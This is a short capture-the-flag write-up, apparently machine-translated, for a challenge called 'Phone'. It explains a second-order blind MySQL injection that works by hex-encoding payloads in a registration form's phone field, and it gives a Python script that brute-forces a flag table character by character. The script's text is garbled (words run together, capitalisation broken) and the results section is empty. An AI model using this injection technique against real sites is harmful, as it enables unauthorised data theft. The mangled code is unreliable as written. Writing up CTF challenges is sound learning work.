NET Tripod Cup title "Phone"--16 binary MySQL Injection

After registering, you can click to see who's phone is similar to mine.

When registering, there are three required fields, namely, user name, password and phone number. Telephone requirements must be number.

After registering for a 1111 phone, click View, return there are 1 people on the phone and I like, in the registration of a 1111, return has 2 people phone and I similar. Description The database is queried, and only numbers are returned.

Blinds The idea of registering when the phone is filled in hex.

So Python is as follows:

#Coding=utf-8ImportRequestsImportBinasciiImportRedeflogin_sqli (url,username,password,payload): URL=URL username=Username Password=Password Headers= {    'user-agent':'mozilla/5.0 (Windows NT 6.1; WOW64; rv:42.0) gecko/20100101 firefox/42.0'    }                #Logindata = {'username': Username,'Password':p Assword,'Phone':p Ayload,'Register':'Login'    }        Try:        #get_sessions =requests.session () req1= S.get (url+'/index.php')                #RegisterREQ2 = S.post (url+'/register.php', data =data)#SqliREQ3 = S.get (url+'/query.php')        returnReq3.textexcept:        Print 'Error'        if __name__=='__main__': Login_url='http://6705466128f243d0aff0aba9deb7317439a2f08c6e9c4760.game.ichunqiu.com'Password='123123'result="'pattern= Re.compile (r'\d?\d?\d?\d?\d?\d')     forIinchRange (1,43):         forJinchRange (33,128): Payload="5555%% ' and Ord (Mid ((SELECT * from flag),%d,1)) =%d #"%(i,j) payload_0x=Binascii.b2a_hex (payload) _payload='0x'+payload_0x username='Userrif'+str (i) +Str (j) Text=login_sqli (login_url,username,password,_payload)#Time.sleep (3)R=Re.search (Pattern,text)if(Int (R.group ()) >0):PrintSTR (i) +' -'+Chr (j)Else:                Continue

Results:

NET Tripod Cup title "Phone"--16 binary MySQL Injection